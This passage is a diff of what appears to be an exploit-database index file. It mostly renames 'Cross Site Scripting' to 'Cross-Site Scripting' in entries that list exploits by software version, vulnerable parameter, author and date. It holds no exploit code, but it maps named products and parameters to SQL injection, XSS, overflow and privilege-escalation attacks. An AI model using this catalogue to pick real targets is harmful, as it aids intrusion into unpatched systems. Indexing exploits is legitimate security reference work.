-35824,platforms/php/webapps/35824.txt,"vBulletin vBExperience 3 - 'sortorder' Parameter Cross Site Scripting",2011-06-06,Mr.ThieF,php,webapps,0 +35824,platforms/php/webapps/35824.txt,"vBulletin vBExperience 3 - 'sortorder' Parameter Cross-Site Scripting",2011-06-06,Mr.ThieF,php,webapps,0 35985,platforms/php/webapps/35985.txt,"Support Incident Tracker (SiT!) 3.63 p1 - report_marketing.php exc[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0 35986,platforms/php/webapps/35986.txt,"Support Incident Tracker (SiT!) 3.63 p1 - billable_incidents.php sites[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0 35984,platforms/php/webapps/35984.txt,"Joomla! Virtual Money 1.5 - 'com_virtualmoney' Component SQL Injection",2011-07-25,FL0RiX,php,webapps,0 35826,platforms/php/webapps/35826.txt,"Joomla CCBoard - SQL Injection / Arbitrary File Upload",2011-06-06,KedAns-Dz,php,webapps,0 35827,platforms/windows/dos/35827.py,"JetAudio 8.1.3 - (Corrupted mp4) Crash POC",2014-12-12,"Drozdova Liudmila",windows,dos,0 35828,platforms/windows/dos/35828.py,"Winamp 5.666 build 3516 - (Corrupted flv) Crash POC",2014-12-12,"Drozdova Liudmila",windows,dos,0 -35829,platforms/php/webapps/35829.txt,"Nakid CMS 1.0.2 - 'CKEditorFuncNum' Parameter Cross Site Scripting",2011-06-06,"AutoSec Tools",php,webapps,0 -35830,platforms/php/webapps/35830.txt,"Multiple WordPress WooThemes - 'test.php' Cross Site Scripting",2011-06-06,MustLive,php,webapps,0 +35829,platforms/php/webapps/35829.txt,"Nakid CMS 1.0.2 - 'CKEditorFuncNum' Parameter Cross-Site Scripting",2011-06-06,"AutoSec Tools",php,webapps,0 +35830,platforms/php/webapps/35830.txt,"Multiple WordPress WooThemes - 'test.php' Cross-Site Scripting",2011-06-06,MustLive,php,webapps,0 35831,platforms/php/webapps/35831.txt,"PopScript 'index.php' Multiple Input Validation Vulnerabilities",2011-06-06,NassRawI,php,webapps,0 -35832,platforms/php/webapps/35832.txt,"Squiz Matrix 4 - 'colour_picker.php' Cross Site Scripting",2011-06-06,"Patrick Webster",php,webapps,0 +35832,platforms/php/webapps/35832.txt,"Squiz Matrix 4 - 'colour_picker.php' Cross-Site Scripting",2011-06-06,"Patrick Webster",php,webapps,0 35833,platforms/php/webapps/35833.txt,"Xataface 1.x - 'action' Parameter Local File Inclusion",2011-06-07,ITSecTeam,php,webapps,0 -35834,platforms/php/webapps/35834.txt,"BLOG:CMS 4.2 Multiple Cross Site Scripting Vulnerabilities",2011-06-07,"Stefan Schurtz",php,webapps,0 +35834,platforms/php/webapps/35834.txt,"BLOG:CMS 4.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-06-07,"Stefan Schurtz",php,webapps,0 35835,platforms/php/webapps/35835.txt,"WordPress GD Star Rating Plugin 'votes' Parameter - SQL Injection",2011-06-08,anonymous,php,webapps,0 35836,platforms/linux/remote/35836.pl,"Perl Data::FormValidator 4.66 Module 'results()' Security Bypass",2011-06-08,dst,linux,remote,0 -35837,platforms/php/webapps/35837.html,"The Pacer Edition CMS 2.1 - 'email' Parameter Cross Site Scripting",2011-06-07,LiquidWorm,php,webapps,0 +35837,platforms/php/webapps/35837.html,"The Pacer Edition CMS 2.1 - 'email' Parameter Cross-Site Scripting",2011-06-07,LiquidWorm,php,webapps,0 35838,platforms/php/webapps/35838.txt,"Tolinet Agencia 'id' Parameter SQL Injection",2011-06-10,"Andrea Bocchetti",php,webapps,0 35839,platforms/php/webapps/35839.txt,"Joomla Minitek FAQ Book 1.3 - 'id' Parameter SQL Injection",2011-06-13,kaMtiEz,php,webapps,0 35840,platforms/php/webapps/35840.txt,"RedaxScript 2.1.0 - Privilege Escalation",2015-01-20,"shyamkumar somana",php,webapps,80 @@ -32322,30 +32322,30 @@ id,file,description,date,author,platform,type,port 35858,platforms/php/webapps/35858.txt,"ArticleFR CMS 3.0.5 - Arbitrary File Upload",2015-01-21,TranDinhTien,php,webapps,0 35859,platforms/hardware/dos/35859.py,"Zhone GPON 2520 R4.0.2.566b - Crash PoC",2015-01-21,"Kaczinski Ramirez",hardware,dos,0 35860,platforms/php/webapps/35860.txt,"vBulletin vBSSO Single Sign-On 1.4.14 - SQL Injection",2015-01-20,Technidev,php,webapps,80 -35861,platforms/php/webapps/35861.txt,"vBTube 1.2.9 - 'vBTube.php' Multiple Cross Site Scripting Vulnerabilities",2011-06-14,Mr.ThieF,php,webapps,0 -35862,platforms/php/webapps/35862.txt,"miniblog 1.0 Multiple Cross Site Scripting Vulnerabilities",2011-06-15,"High-Tech Bridge SA",php,webapps,0 +35861,platforms/php/webapps/35861.txt,"vBTube 1.2.9 - 'vBTube.php' Multiple Cross-Site Scripting Vulnerabilities",2011-06-14,Mr.ThieF,php,webapps,0 +35862,platforms/php/webapps/35862.txt,"miniblog 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-06-15,"High-Tech Bridge SA",php,webapps,0 35863,platforms/php/webapps/35863.php,"myBloggie 2.1.6 HTML-injection and SQL Injection",2011-06-15,"Robin Verton",php,webapps,0 -35864,platforms/windows/remote/35864.txt,"Sunway ForceControl 6.1 Multiple Heap Based Buffer Overflow Vulnerabilities",2011-06-17,"Dillon Beresford",windows,remote,0 +35864,platforms/windows/remote/35864.txt,"Sunway ForceControl 6.1 - Multiple Heap Based Buffer Overflow Vulnerabilities",2011-06-17,"Dillon Beresford",windows,remote,0 35865,platforms/php/webapps/35865.txt,"Nibbleblog Multiple SQL Injection",2011-06-19,KedAns-Dz,php,webapps,0 -35866,platforms/php/webapps/35866.txt,"Immophp 1.1.1 Cross Site Scripting and SQL Injection",2011-06-18,KedAns-Dz,php,webapps,0 -35867,platforms/php/webapps/35867.txt,"Taha Portal 3.2 - 'sitemap.php' Cross Site Scripting",2011-06-18,Bl4ck.Viper,php,webapps,0 +35866,platforms/php/webapps/35866.txt,"Immophp 1.1.1 Cross-Site Scripting and SQL Injection",2011-06-18,KedAns-Dz,php,webapps,0 +35867,platforms/php/webapps/35867.txt,"Taha Portal 3.2 - 'sitemap.php' Cross-Site Scripting",2011-06-18,Bl4ck.Viper,php,webapps,0 35868,platforms/linux_mips/shellcode/35868.c,"Linux/MIPS - execve /bin/sh shellcode (36 bytes)",2015-01-22,Sanguine,linux_mips,shellcode,0 35869,platforms/windows/dos/35869.txt,"Crystal Player 1.99 - Memory Corruption",2015-01-21,"Kapil Soni",windows,dos,0 35870,platforms/windows/dos/35870.rb,"Exif Pilot 4.7.2 - SEH Based Buffer Overflow",2015-01-22,"Osanda Malith",windows,dos,0 -35871,platforms/php/webapps/35871.txt,"Sitemagic CMS 2010.04.17 - 'SMExt' Parameter Cross Site Scripting",2011-06-21,"Gjoko Krstic",php,webapps,0 +35871,platforms/php/webapps/35871.txt,"Sitemagic CMS 2010.04.17 - 'SMExt' Parameter Cross-Site Scripting",2011-06-21,"Gjoko Krstic",php,webapps,0 35872,platforms/asp/webapps/35872.txt,"H3C ER5100 Authentication Bypass",2011-06-22,128bit,asp,webapps,0 35873,platforms/windows/dos/35873.txt,"Wireshark 1.4.5 - 'bytes_repr_len()' NULL Pointer Dereference Denial Of Service",2011-06-17,rouli,windows,dos,0 35874,platforms/php/webapps/35874.txt,"Eshop Manager Multiple SQL Injection",2011-06-22,"Number 7",php,webapps,0 -35875,platforms/php/webapps/35875.txt,"FanUpdate 3.0 - 'pageTitle' Parameter Cross Site Scripting",2011-06-22,"High-Tech Bridge SA",php,webapps,0 +35875,platforms/php/webapps/35875.txt,"FanUpdate 3.0 - 'pageTitle' Parameter Cross-Site Scripting",2011-06-22,"High-Tech Bridge SA",php,webapps,0 35876,platforms/windows/dos/35876.html,"Easewe FTP OCX ActiveX Control 4.5.0.9 - 'EaseWeFtp.ocx' Multiple Insecure Method Vulnerabilities",2011-06-22,"High-Tech Bridge SA",windows,dos,0 35877,platforms/php/webapps/35877.txt,"Sitemagic CMS 'SMTpl' Parameter Directory Traversal",2011-06-23,"Andrea Bocchetti",php,webapps,0 -35878,platforms/php/webapps/35878.txt,"ecommerceMajor - SQL Injection And Authentication bypass",2015-01-22,"Manish Tanwar",php,webapps,0 +35878,platforms/php/webapps/35878.txt,"ecommerceMajor - SQL Injection / Authentication bypass",2015-01-22,"Manish Tanwar",php,webapps,0 35879,platforms/php/webapps/35879.txt,"WordPress Cforms Plugin 14.7 - Remote Code Execution",2015-01-19,Zakhar,php,webapps,0 35880,platforms/windows/remote/35880.html,"LEADTOOLS Imaging LEADSmtp ActiveX Control 'SaveMessage()' Insecure Method",2011-06-23,"High-Tech Bridge SA",windows,remote,0 35881,platforms/windows/remote/35881.c,"xAurora 10.00 - 'RSRC32.DLL' DLL Loading Arbitrary Code Execution",2011-06-24,"Zer0 Thunder",windows,remote,0 35882,platforms/php/webapps/35882.txt,"Nodesforum '_nodesforum_node' Parameter SQL Injection",2011-06-23,"Andrea Bocchetti",php,webapps,0 35883,platforms/php/webapps/35883.txt,"Joomla! 'com_morfeoshow' Component 'idm' Parameter SQL Injection",2011-06-27,Th3.xin0x,php,webapps,0 -35884,platforms/php/webapps/35884.txt,"Mambo CMS 4.6.x Multiple Cross Site Scripting Vulnerabilities",2011-06-27,"Aung Khant",php,webapps,0 +35884,platforms/php/webapps/35884.txt,"Mambo CMS 4.6.x Multiple Cross-Site Scripting Vulnerabilities",2011-06-27,"Aung Khant",php,webapps,0 35885,platforms/windows/remote/35885.txt,"Ubisoft CoGSManager ActiveX Control 1.0.0.23 - 'Initialize()' Method Stack Buffer Overflow",2011-06-27,"Luigi Auriemma",windows,remote,0 35886,platforms/windows/remote/35886.txt,"Sybase Advantage Server 10.0.0.3 - 'ADS' Process Off By One Buffer Overflow",2011-06-27,"Luigi Auriemma",windows,remote,0 35887,platforms/hardware/remote/35887.txt,"Cisco Ironport Appliances - Privilege Escalation",2015-01-22,"Glafkos Charalambous ",hardware,remote,0 @@ -32355,9 +32355,9 @@ id,file,description,date,author,platform,type,port 35891,platforms/jsp/webapps/35891.txt,"ManageEngine ServiceDesk Plus 9.0 - User Enumeration",2015-01-22,"Muhammad Ahmed Siddiqui",jsp,webapps,8080 35892,platforms/multiple/remote/35892.txt,"MySQLDriverCS 4.0.1 SQL Injection",2011-06-27,"Qihan Luo",multiple,remote,0 35893,platforms/php/webapps/35893.txt,"WordPress Pretty Link Lite Plugin 1.4.56 - Multiple SQL Injection",2011-06-27,MaKyOtOx,php,webapps,0 -35894,platforms/php/webapps/35894.txt,"Joomla! CMS 1.6.3 Multiple Cross Site Scripting Vulnerabilities",2011-06-28,"Aung Khant",php,webapps,0 +35894,platforms/php/webapps/35894.txt,"Joomla! CMS 1.6.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-06-28,"Aung Khant",php,webapps,0 35895,platforms/windows/dos/35895.txt,"RealityServer Web Services RTMP Server 3.1.1 build 144525.5 NULL Pointer Dereference Denial Of Service",2011-06-28,"Luigi Auriemma",windows,dos,0 -35896,platforms/php/webapps/35896.txt,"FlatPress 0.1010.1 Multiple Cross Site Scripting Vulnerabilities",2011-06-28,"High-Tech Bridge SA",php,webapps,0 +35896,platforms/php/webapps/35896.txt,"FlatPress 0.1010.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-06-28,"High-Tech Bridge SA",php,webapps,0 35897,platforms/windows/remote/35897.html,"CygniCon CyViewer ActiveX Control 'SaveData()' Insecure Method",2011-06-28,"High-Tech Bridge SA",windows,remote,0 35898,platforms/multiple/remote/35898.php,"Atlassian JIRA 3.13.5 File Download Security Bypass",2011-06-28,"Ignacio Garrido",multiple,remote,0 35899,platforms/php/webapps/35899.txt,"Mangallam CMS - SQL Injection Web",2015-01-26,Vulnerability-Lab,php,webapps,0 @@ -32372,12 +32372,12 @@ id,file,description,date,author,platform,type,port 35913,platforms/android/dos/35913.txt,"Android WiFi-Direct Denial of Service",2015-01-26,"Core Security",android,dos,0 35910,platforms/jsp/webapps/35910.txt,"ManageEngine EventLog Analyzer 9.0 - Directory Traversal / XSS",2015-01-26,"Sepahan TelCom IT Group",jsp,webapps,0 35911,platforms/multiple/webapps/35911.txt,"jclassifiedsmanager - Multiple Vulnerabilities",2015-01-26,"Sarath Nair",multiple,webapps,0 -36313,platforms/php/webapps/36313.txt,"webERP 4.3.8 Multiple Script URI XSS",2011-11-17,"High-Tech Bridge SA",php,webapps,0 +36313,platforms/php/webapps/36313.txt,"webERP 4.3.8 - Multiple Script URI XSS",2011-11-17,"High-Tech Bridge SA",php,webapps,0 35982,platforms/windows/webapps/35982.txt,"Hewlett-Packard UCMDB - JMX-Console Authentication Bypass",2015-02-03,"Hans-Martin Muench",windows,webapps,8080 35983,platforms/windows/local/35983.rb,"MS15-004 Microsoft Remote Desktop Services Web Proxy IE Sandbox Escape",2015-02-03,Metasploit,windows,local,0 35988,platforms/php/webapps/35988.txt,"Support Incident Tracker (SiT!) 3.63 p1 - tasks.php selected[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0 35989,platforms/php/webapps/35989.txt,"MBoard 1.3 - 'url' Parameter URI Redirection",2011-07-27,"High-Tech Bridge SA",php,webapps,0 -35990,platforms/php/webapps/35990.txt,"PHPJunkYard GBook 1.6/1.7 Multiple Cross Site Scripting Vulnerabilities",2011-07-27,"High-Tech Bridge SA",php,webapps,0 +35990,platforms/php/webapps/35990.txt,"PHPJunkYard GBook 1.6/1.7 - Multiple Cross-Site Scripting Vulnerabilities",2011-07-27,"High-Tech Bridge SA",php,webapps,0 35991,platforms/php/webapps/35991.txt,"Pragyan CMS 3.0 - SQL Injection",2015-02-04,"Steffen Rösemann",php,webapps,80 35914,platforms/php/webapps/35914.txt,"ferretCMS 1.0.4-alpha - Multiple Vulnerabilities",2015-01-26,"Steffen Rösemann",php,webapps,80 35915,platforms/multiple/webapps/35915.txt,"Symantec Data Center Security - Multiple Vulnerabilities",2015-01-26,"SEC Consult",multiple,webapps,0 @@ -32385,17 +32385,17 @@ id,file,description,date,author,platform,type,port 35917,platforms/hardware/remote/35917.txt,"D-Link DSL-2740R - Unauthenticated Remote DNS Change Exploit",2015-01-27,"Todor Donev",hardware,remote,0 35918,platforms/multiple/remote/35918.c,"IBM DB2 - 'DT_RPATH' Insecure Library Loading Arbitrary Code Execution",2011-06-30,"Tim Brown",multiple,remote,0 35919,platforms/bsd/remote/35919.c,"NetBSD 5.1 - Multiple 'libc/net' Functions Stack Buffer Overflow",2011-07-01,"Maksymilian Arciemowicz",bsd,remote,0 -35920,platforms/php/webapps/35920.txt,"WebCalendar 1.2.3 Multiple Cross Site Scripting Vulnerabilities",2011-07-04,"Stefan Schurtz",php,webapps,0 +35920,platforms/php/webapps/35920.txt,"WebCalendar 1.2.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-07-04,"Stefan Schurtz",php,webapps,0 35921,platforms/windows/remote/35921.html,"iMesh 10.0 - 'IMWebControl.dll' ActiveX Control Buffer Overflow",2011-07-04,KedAns-Dz,windows,remote,0 35922,platforms/php/webapps/35922.txt,"Joomla! 'com_jr_tfb' Component 'controller' Parameter Local File Inclusion",2011-07-05,FL0RiX,php,webapps,0 -35923,platforms/asp/webapps/35923.txt,"Paliz Portal Cross Site Scripting and Multiple SQL Injection",2011-07-02,Net.Edit0r,asp,webapps,0 +35923,platforms/asp/webapps/35923.txt,"Paliz Portal Cross-Site Scripting and Multiple SQL Injection",2011-07-02,Net.Edit0r,asp,webapps,0 35924,platforms/windows/remote/35924.py,"ClearSCADA - Remote Authentication Bypass Exploit",2015-01-28,"Jeremy Brown",windows,remote,0 35925,platforms/hardware/remote/35925.txt,"Portech MV-372 VoIP Gateway Multiple Security Vulnerabilities",2011-07-05,"Zsolt Imre",hardware,remote,0 35926,platforms/asp/webapps/35926.txt,"eTAWASOL 'id' Parameter SQL Injection",2011-07-03,Bl4ck.Viper,asp,webapps,0 -35927,platforms/php/webapps/35927.txt,"Classified Script c-BrowseClassified URL Cross Site Scripting",2011-07-05,"Raghavendra Karthik D",php,webapps,0 +35927,platforms/php/webapps/35927.txt,"Classified Script c-BrowseClassified URL Cross-Site Scripting",2011-07-05,"Raghavendra Karthik D",php,webapps,0 35928,platforms/windows/remote/35928.html,"Pro Softnet IDrive Online Backup 3.4.0 ActiveX SaveToFile() Arbitrary File Overwrite",2011-07-06,"High-Tech Bridge SA",windows,remote,0 35929,platforms/php/webapps/35929.txt,"Joomla! 'com_voj' Component SQL Injection",2011-07-08,CoBRa_21,php,webapps,0 -35930,platforms/php/webapps/35930.txt,"Prontus CMS 'page' Parameter Cross Site Scripting",2011-07-11,Zerial,php,webapps,0 +35930,platforms/php/webapps/35930.txt,"Prontus CMS 'page' Parameter Cross-Site Scripting",2011-07-11,Zerial,php,webapps,0 35931,platforms/php/webapps/35931.txt,"ICMusic '1.2 music_id' Parameter SQL Injection",2011-07-11,kaMtiEz,php,webapps,0 35932,platforms/hardware/remote/35932.c,"VSAT Sailor 900 - Remote Exploit",2015-01-29,"Nicholas Lemonias",hardware,remote,0 35933,platforms/hardware/webapps/35933.txt,"ManageEngine Firewall Analyzer 8.0 - Directory Traversal / XSS",2015-01-29,"Sepahan TelCom IT Group",hardware,webapps,0 @@ -32403,10 +32403,10 @@ id,file,description,date,author,platform,type,port 35935,platforms/windows/local/35935.py,"UniPDF 1.1 - Crash PoC (SEH overwritten)",2015-01-29,bonze,windows,local,0 35936,platforms/windows/local/35936.py,"Microsoft Windows Server 2003 SP2 - Privilege Escalation",2015-01-29,KoreLogic,windows,local,0 35938,platforms/freebsd/dos/35938.txt,"FreeBSD Kernel - Multiple Vulnerabilities",2015-01-29,"Core Security",freebsd,dos,0 -35939,platforms/hardware/dos/35939.txt,"Alice Modem 1111 - 'rulename' Parameter Cross Site Scripting / Denial of Service",2011-07-12,"Moritz Naumann",hardware,dos,0 +35939,platforms/hardware/dos/35939.txt,"Alice Modem 1111 - 'rulename' Parameter Cross-Site Scripting / Denial of Service",2011-07-12,"Moritz Naumann",hardware,dos,0 35940,platforms/php/webapps/35940.txt,"Sphider 1.3.x Admin Panel Multiple SQL Injection",2011-07-12,"Karthik R",php,webapps,0 -35941,platforms/multiple/webapps/35941.txt,"Flowplayer 3.2.7 linkUrl' Parameter Cross Site Scripting",2011-07-12,"Szymon Gruszecki",multiple,webapps,0 -35942,platforms/php/webapps/35942.txt,"TCExam 11.2.x Multiple Cross Site Scripting Vulnerabilities",2011-07-13,"Gjoko Krstic",php,webapps,0 +35941,platforms/multiple/webapps/35941.txt,"Flowplayer 3.2.7 linkUrl' Parameter Cross-Site Scripting",2011-07-12,"Szymon Gruszecki",multiple,webapps,0 +35942,platforms/php/webapps/35942.txt,"TCExam 11.2.x Multiple Cross-Site Scripting Vulnerabilities",2011-07-13,"Gjoko Krstic",php,webapps,0 35943,platforms/php/webapps/35943.txt,"Chyrp 2.x admin/help.php Multiple Parameter XSS",2011-07-13,Wireghoul,php,webapps,0 35944,platforms/php/webapps/35944.txt,"Chyrp 2.x includes/javascript.php action Parameter XSS",2011-07-13,Wireghoul,php,webapps,0 35945,platforms/php/webapps/35945.txt,"Chyrp 2.x URI action Parameter Traversal Local File Inclusion",2011-07-29,Wireghoul,php,webapps,0 @@ -32428,7 +32428,7 @@ id,file,description,date,author,platform,type,port 35962,platforms/windows/local/35962.c,"Trend Micro Multiple Products 8.0.1133 - Privilege Escalation",2015-01-31,"Parvez Anwar",windows,local,0 35987,platforms/php/webapps/35987.txt,"Support Incident Tracker (SiT!) 3.63 p1 search.php search_string Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0 35964,platforms/windows/local/35964.c,"Symantec Altiris Agent 6.9 (Build 648) - Privilege Escalation",2015-02-01,"Parvez Anwar",windows,local,0 -35965,platforms/php/webapps/35965.txt,"Joomla! 'com_resman' Component Cross Site Scripting",2011-07-15,SOLVER,php,webapps,0 +35965,platforms/php/webapps/35965.txt,"Joomla! 'com_resman' Component Cross-Site Scripting",2011-07-15,SOLVER,php,webapps,0 35966,platforms/php/webapps/35966.txt,"Joomla! 'com_newssearch' Component SQL Injection",2011-07-15,"Robert Cooper",php,webapps,0 35967,platforms/php/webapps/35967.txt,"AJ Classifieds 'listingid' Parameter - SQL Injection",2011-07-15,Lazmania61,php,webapps,0 35968,platforms/php/webapps/35968.txt,"BlueSoft Multiple Products - Multiple SQL Injection",2011-07-18,Lazmania61,php,webapps,0 @@ -32436,35 +32436,35 @@ id,file,description,date,author,platform,type,port 35970,platforms/hardware/remote/35970.txt,"Iskratel SI2000 Callisto 821+ - Cross Site Request Forgery / HTML Injection",2011-07-18,MustLive,hardware,remote,0 35971,platforms/php/webapps/35971.txt,"WordPress bSuite Plugin 4.0.7 - Multiple HTML Injection Vulnerabilities",2011-07-11,IHTeam,php,webapps,0 35972,platforms/php/webapps/35972.txt,"Sefrengo CMS 1.6.1 - Multiple SQL Injection",2015-02-02,"ITAS Team",php,webapps,0 -35973,platforms/php/webapps/35973.txt,"Joomla! 1.6.5 and Prior Multiple Cross Site Scripting Vulnerabilities",2011-07-20,"YGN Ethical Hacker Group",php,webapps,0 -35974,platforms/php/webapps/35974.txt,"Tiki Wiki CMS Groupware 7.2 - 'snarf_ajax.php' Cross Site Scripting",2011-07-20,"High-Tech Bridge SA",php,webapps,0 -35975,platforms/php/webapps/35975.txt,"Cyberoam UTM Multiple Cross Site Scripting Vulnerabilities",2011-07-20,"Patrick Webster",php,webapps,0 +35973,platforms/php/webapps/35973.txt,"Joomla! 1.6.5 and Prior Multiple Cross-Site Scripting Vulnerabilities",2011-07-20,"YGN Ethical Hacker Group",php,webapps,0 +35974,platforms/php/webapps/35974.txt,"Tiki Wiki CMS Groupware 7.2 - 'snarf_ajax.php' Cross-Site Scripting",2011-07-20,"High-Tech Bridge SA",php,webapps,0 +35975,platforms/php/webapps/35975.txt,"Cyberoam UTM Multiple Cross-Site Scripting Vulnerabilities",2011-07-20,"Patrick Webster",php,webapps,0 35976,platforms/php/webapps/35976.txt,"Synergy Software 'id' Parameter SQL Injection",2011-07-21,Ehsan_Hp200,php,webapps,0 35977,platforms/php/webapps/35977.txt,"Godly Forums 'id' Parameter SQL Injection",2011-07-25,3spi0n,php,webapps,0 -35978,platforms/php/webapps/35978.txt,"Online Grades 3.2.5 Multiple Cross Site Scripting Vulnerabilities",2011-07-25,"Gjoko Krstic",php,webapps,0 +35978,platforms/php/webapps/35978.txt,"Online Grades 3.2.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-07-25,"Gjoko Krstic",php,webapps,0 35979,platforms/php/webapps/35979.txt,"Willscript Recipes Website Script Silver Edition 'viewRecipe.php' SQL Injection",2011-07-25,Lazmania61,php,webapps,0 36040,platforms/php/webapps/36040.txt,"Chamilo LMS 1.9.8 Blind SQL Injection",2015-02-09,"Kacper Szurek",php,webapps,80 36000,platforms/php/webapps/36000.txt,"HP Network Automation 9.10 SQL Injection",2011-07-28,anonymous,php,webapps,0 36001,platforms/asp/webapps/36001.txt,"Sitecore CMS 6.4.1 - 'url' Parameter URI Redirection",2011-07-28,"Tom Neaves",asp,webapps,0 36002,platforms/jsp/webapps/36002.txt,"IBM Tivoli Service Automation Manager 7.2.4 - Remote Code Execution",2014-12-12,"Jakub Palaczynski",jsp,webapps,0 -36003,platforms/php/webapps/36003.txt,"Curverider Elgg 1.7.9 Multiple Cross Site Scripting Vulnerabilities",2011-08-01,"Aung Khant",php,webapps,0 +36003,platforms/php/webapps/36003.txt,"Curverider Elgg 1.7.9 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-01,"Aung Khant",php,webapps,0 36004,platforms/multiple/remote/36004.txt,"Skype 5.3 - 'Mobile Phone' Field HTML Injection",2011-08-01,noptrix,multiple,remote,0 36005,platforms/php/webapps/36005.txt,"MyBB MyTabs Plugin 'tab' Parameter SQL Injection",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0 36006,platforms/multiple/remote/36006.java,"Open Handset Alliance Android 2.3.4/3.1 - Browser Sandbox Security Bypass",2011-08-02,"Roee Hay",multiple,remote,0 36007,platforms/multiple/dos/36007.txt,"AzeoTech DAQFactory Denial of Service",2011-06-24,"Knud Erik Hojgaard",multiple,dos,0 36008,platforms/php/webapps/36008.txt,"Gilnet News 'read_more.php' SQL Injection",2011-07-11,Err0R,php,webapps,0 -36009,platforms/php/webapps/36009.txt,"mt LinkDatenbank 'b' Parameter Cross Site Scripting",2011-08-03,Err0R,php,webapps,0 -36010,platforms/asp/webapps/36010.txt,"BESNI OKUL PORTAL 'sayfa.asp' Cross Site Scripting",2011-08-03,Err0R,asp,webapps,0 +36009,platforms/php/webapps/36009.txt,"mt LinkDatenbank 'b' Parameter Cross-Site Scripting",2011-08-03,Err0R,php,webapps,0 +36010,platforms/asp/webapps/36010.txt,"BESNI OKUL PORTAL 'sayfa.asp' Cross-Site Scripting",2011-08-03,Err0R,asp,webapps,0 36011,platforms/asp/webapps/36011.txt,"Ataccan E-ticaret Scripti 'id' Parameter SQL Injection",2011-08-03,Err0R,asp,webapps,0 36012,platforms/php/webapps/36012.txt,"Joomla! Slideshow Gallery Component 'id' Parameter SQL Injection",2011-08-03,"Ne0 H4ck3R",php,webapps,0 36013,platforms/multiple/remote/36013.txt,"foomatic-gui python-foomatic 0.7.9.4 - 'pysmb.py' Remote Arbitrary Shell Command Execution",2011-08-03,daveb,multiple,remote,0 36014,platforms/hardware/remote/36014.pl,"LG DVR LE6016D - Unauthenticated Remote Users/Passwords Disclosure exploit",2015-02-07,"Todor Donev",hardware,remote,0 36015,platforms/php/webapps/36015.txt,"Joomla! 'com_community' Component 'userid' Parameter SQL Injection",2011-08-03,"Ne0 H4ck3R",php,webapps,0 36016,platforms/multiple/remote/36016.txt,"Xpdf 3.02-13 - 'zxpdf' Security Bypass",2011-08-04,"Chung-chieh Shan",multiple,remote,0 -36017,platforms/php/webapps/36017.txt,"HESK 2.2 Multiple Cross Site Scripting Vulnerabilities",2011-08-03,"High-Tech Bridge SA",php,webapps,0 -36018,platforms/php/webapps/36018.txt,"WordPress WP e-Commerce Plugin 3.8.6 - 'cart_messages[]' Parameter Cross Site Scripting",2011-08-04,"High-Tech Bridge SA",php,webapps,0 -36019,platforms/asp/webapps/36019.txt,"Community Server 2007/2008 - 'TagSelector.aspx' Cross Site Scripting",2011-08-04,PontoSec,asp,webapps,0 -36020,platforms/windows/remote/36020.txt,"Microsoft Visual Studio Report Viewer 2005 Control Multiple Cross Site Scripting Vulnerabilities",2011-08-09,"Adam Bixby",windows,remote,0 +36017,platforms/php/webapps/36017.txt,"HESK 2.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-03,"High-Tech Bridge SA",php,webapps,0 +36018,platforms/php/webapps/36018.txt,"WordPress WP e-Commerce Plugin 3.8.6 - 'cart_messages[]' Parameter Cross-Site Scripting",2011-08-04,"High-Tech Bridge SA",php,webapps,0 +36019,platforms/asp/webapps/36019.txt,"Community Server 2007/2008 - 'TagSelector.aspx' Cross-Site Scripting",2011-08-04,PontoSec,asp,webapps,0 +36020,platforms/windows/remote/36020.txt,"Microsoft Visual Studio Report Viewer 2005 Control Multiple Cross-Site Scripting Vulnerabilities",2011-08-09,"Adam Bixby",windows,remote,0 36041,platforms/php/webapps/36041.txt,"Fork CMS 3.8.5 - SQL Injection",2015-02-09,"Sven Schleier",php,webapps,80 36022,platforms/windows/dos/36022.py,"MooPlayer 1.3.0 - 'm3u' SEH Buffer Overflow PoC (1)",2015-02-09,"Samandeep Singh",windows,dos,0 36023,platforms/php/webapps/36023.txt,"Redaxscript CMS 2.2.0 - SQL Injection",2015-02-09,"ITAS Team",php,webapps,0 @@ -32473,49 +32473,49 @@ id,file,description,date,author,platform,type,port 36026,platforms/php/webapps/36026.txt,"u5CMS 3.9.3 - (deletefile.php) Arbitrary File Deletion",2015-02-09,LiquidWorm,php,webapps,0 36027,platforms/php/webapps/36027.txt,"u5CMS 3.9.3 - Multiple SQL Injection",2015-02-09,LiquidWorm,php,webapps,0 36028,platforms/php/webapps/36028.txt,"u5CMS 3.9.3 - (thumb.php) Local File Inclusion",2015-02-09,LiquidWorm,php,webapps,0 -36029,platforms/php/webapps/36029.txt,"u5CMS 3.9.3 - Multiple Stored And Reflected XSS Vulnerabilities",2015-02-09,LiquidWorm,php,webapps,0 +36029,platforms/php/webapps/36029.txt,"u5CMS 3.9.3 - Multiple Stored XSS / Reflected XSS Vulnerabilities",2015-02-09,LiquidWorm,php,webapps,0 36031,platforms/php/webapps/36031.txt,"StaMPi - Local File Inclusion",2015-02-09,"e . V . E . L",php,webapps,0 36058,platforms/php/webapps/36058.txt,"WordPress Video Gallery 2.7.0 - SQL Injection",2015-02-12,"Claudio Viviani",php,webapps,0 -36032,platforms/php/webapps/36032.txt,"Softbiz Recipes Portal Script Multiple Cross Site Scripting Vulnerabilities",2011-08-05,Net.Edit0r,php,webapps,0 -36033,platforms/php/webapps/36033.txt,"Search Network 2.0 - 'query' Parameter Cross Site Scripting",2011-08-08,darkTR,php,webapps,0 -36034,platforms/php/webapps/36034.txt,"OpenEMR 4.0 Multiple Cross Site Scripting Vulnerabilities",2011-08-09,"Houssam Sahli",php,webapps,0 +36032,platforms/php/webapps/36032.txt,"Softbiz Recipes Portal Script Multiple Cross-Site Scripting Vulnerabilities",2011-08-05,Net.Edit0r,php,webapps,0 +36033,platforms/php/webapps/36033.txt,"Search Network 2.0 - 'query' Parameter Cross-Site Scripting",2011-08-08,darkTR,php,webapps,0 +36034,platforms/php/webapps/36034.txt,"OpenEMR 4.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-09,"Houssam Sahli",php,webapps,0 36035,platforms/php/webapps/36035.txt,"BlueSoft Banner Exchange 